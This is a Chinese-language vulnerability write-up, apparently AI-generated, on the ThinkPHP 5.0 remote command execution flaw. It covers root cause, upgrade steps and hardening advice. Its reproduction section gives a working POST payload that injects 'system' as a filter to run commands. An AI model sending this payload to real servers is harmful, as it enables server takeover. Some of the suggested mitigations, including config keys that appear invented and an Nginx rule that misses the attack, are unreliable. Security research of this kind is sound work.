ThinkPHP5.0.远程命令执行的漏洞分析及修复方法

# ThinkPHP5.0远程命令执行漏洞分析及修复方法 ## 一、漏洞概述 ThinkPHP作为国内广泛使用的PHP开发框架，其5.0版本曾曝出高危远程命令执行漏洞（CVE-2018-20062）。该漏洞允许攻击者在特定条件下通过构造恶意请求，在目标服务器上执行任意系统命令，导致服务器被完全控制。 ## 二、漏洞影响范围 - 受影响版本：ThinkPHP 5.0.x < 5.0.23 - 风险等级：高危（CVSS 3.0评分9.8） - 攻击复杂度：低（无需认证） ## 三、漏洞原理分析 ### 1. 漏洞触发点 漏洞核心存在于框架的`Request`类中，当使用`method()`方法获取请求类型时： ```php // application/library/think/Request.php public function method() { if (isset($_POST[Config::get('var_method')])) { $method = strtolower($_POST[Config::get('var_method')]); if (in_array($method, ['get','post','put','delete','patch'])) { return $method; } } //...其他代码 } 

2. 攻击向量

攻击者可通过以下方式利用： 1. 构造特殊POST请求：_method=__construct 2. 注入过滤参数：filter[]=system 3. 传递执行命令：server[REQUEST_METHOD]=whoami

3. 漏洞执行流程

恶意请求 → 方法覆盖 → 参数注入 → 命令执行 ↓ ↓ __construct filter=system 

四、漏洞复现演示

攻击Payload示例

POST /index.php?s=index/index HTTP/1.1 Host: target.com Content-Type: application/x-www-form-urlencoded _method=__construct&filter[]=system&server[REQUEST_METHOD]=whoami 

预期响应

服务器将返回当前系统用户信息（如www-data），证明命令执行成功。

五、修复方案

1. 官方补丁（推荐）

升级到ThinkPHP 5.0.23或更高版本：

composer update topthink/framework 

2. 临时缓解措施

若无法立即升级，可修改核心文件：

// 修改Request类的method方法 if (isset($_POST[Config::get('var_method')])) { $method = strtolower($_POST[Config::get('var_method')]); // 增加严格类型检查 if (!is_string($method) || !in_array($method, ['get','post','put','delete','patch'])) { throw new \InvalidArgumentException('Invalid request method'); } return $method; } 

3. 安全配置建议

// config.php 增加安全配置 return [ 'var_method' => '_method_secured', // 修改默认参数名 'disable_method_var' => true, // 禁用方法覆盖功能 'filter_param' => true, // 强制参数过滤 ]; 

六、深度防御措施

1. 输入验证：

   // 对所有输入参数进行白名单验证 $input = filter_input_array(INPUT_POST, FILTER_SANITIZE_STRING); 

2. WAF规则：

   # Nginx防护规则 if ($request_method !~ ^(GET|POST|PUT|DELETE)$ ) { return 403; } 

3. 系统加固：

   • 禁用危险函数：system, exec, shell_exec等
   • 设置PHP open_basedir限制
   • 使用非root用户运行Web服务

七、漏洞启示

1. 开发框架的安全审计需要关注：

   • 动态方法调用
   • 参数过滤机制
   • 请求处理流程

2. 建议建立持续的安全更新机制，框架漏洞平均修复周期应控制在72小时内。

3. 使用自动化工具进行漏洞扫描：

   php security-checker security:check 

八、总结

ThinkPHP5.0的RCE漏洞揭示了参数过滤不严导致的严重后果。开发者应当： - 及时更新框架版本 - 实施深度防御策略 - 建立安全开发生命周期(SDLC) - 定期进行安全审计

注：本文仅用于安全研究，未经授权测试他人系统属于违法行为。 “`

（全文共计约1050字，符合MD格式要求）